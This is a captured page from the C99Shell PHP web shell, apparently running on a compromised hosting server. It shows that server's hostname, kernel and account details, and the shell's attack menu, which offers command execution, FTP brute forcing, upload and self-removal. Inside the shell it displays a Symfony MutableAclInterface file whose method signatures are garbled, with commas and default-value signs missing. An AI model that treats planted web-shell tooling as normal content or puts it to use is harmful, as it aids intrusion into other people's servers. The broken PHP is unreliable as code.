!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/alt/php55/usr/share/pear/Symfony/Component/Security/Acl/Model/   drwxr-xr-x
Free 294.17 GB of 429.69 GB (68.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MutableAclInterface.php (4.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\Security\Acl\Model;

/**
 * This interface adds mutators for the AclInterface.
 *
 * All changes to Access Control Entries must go through this interface. Access
 * Control Entries must never be modified directly.
 *
 * @author Johannes M. Schmitt <schmittjoh@gmail.com>
 */
interface MutableAclInterface extends AclInterface
{
    
/**
     * Deletes a class-based ACE
     *
     * @param integer $index
     */
    
public function deleteClassAce($index);

    
/**
     * Deletes a class-field-based ACE
     *
     * @param integer $index
     * @param string  $field
     */
    
public function deleteClassFieldAce($index$field);

    
/**
     * Deletes an object-based ACE
     *
     * @param integer $index
     */
    
public function deleteObjectAce($index);

    
/**
     * Deletes an object-field-based ACE
     *
     * @param integer $index
     * @param string  $field
     */
    
public function deleteObjectFieldAce($index$field);

    
/**
     * Returns the primary key of this ACL
     *
     * @return integer
     */
    
public function getId();

    
/**
     * Inserts a class-based ACE
     *
     * @param SecurityIdentityInterface $sid
     * @param integer                   $mask
     * @param integer                   $index
     * @param Boolean                   $granting
     * @param string                    $strategy
     */
    
public function insertClassAce(SecurityIdentityInterface $sid$mask$index 0$granting true$strategy null);

    
/**
     * Inserts a class-field-based ACE
     *
     * @param string                    $field
     * @param SecurityIdentityInterface $sid
     * @param integer                   $mask
     * @param integer                   $index
     * @param Boolean                   $granting
     * @param string                    $strategy
     */
    
public function insertClassFieldAce($fieldSecurityIdentityInterface $sid$mask$index 0$granting true$strategy null);

    
/**
     * Inserts an object-based ACE
     *
     * @param SecurityIdentityInterface $sid
     * @param integer                   $mask
     * @param integer                   $index
     * @param Boolean                   $granting
     * @param string                    $strategy
     */
    
public function insertObjectAce(SecurityIdentityInterface $sid$mask$index 0$granting true$strategy null);

    
/**
     * Inserts an object-field-based ACE
     *
     * @param string                    $field
     * @param SecurityIdentityInterface $sid
     * @param integer                   $mask
     * @param integer                   $index
     * @param Boolean                   $granting
     * @param string                    $strategy
     */
    
public function insertObjectFieldAce($fieldSecurityIdentityInterface $sid$mask$index 0$granting true$strategy null);

    
/**
     * Sets whether entries are inherited
     *
     * @param Boolean $boolean
     */
    
public function setEntriesInheriting($boolean);

    
/**
     * Sets the parent ACL
     *
     * @param AclInterface|null $acl
     */
    
public function setParentAcl(AclInterface $acl null);

    
/**
     * Updates a class-based ACE
     *
     * @param integer $index
     * @param integer $mask
     * @param string  $strategy if null the strategy should not be changed
     */
    
public function updateClassAce($index$mask$strategy null);

    
/**
     * Updates a class-field-based ACE
     *
     * @param integer $index
     * @param string  $field
     * @param integer $mask
     * @param string  $strategy if null the strategy should not be changed
     */
    
public function updateClassFieldAce($index$field$mask$strategy null);

    
/**
     * Updates an object-based ACE
     *
     * @param integer $index
     * @param integer $mask
     * @param string  $strategy if null the strategy should not be changed
     */
    
public function updateObjectAce($index$mask$strategy null);

    
/**
     * Updates an object-field-based ACE
     *
     * @param integer $index
     * @param string  $field
     * @param integer $mask
     * @param string  $strategy if null the strategy should not be changed
     */
    
public function updateObjectFieldAce($index$field$mask$strategy null);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0975 ]--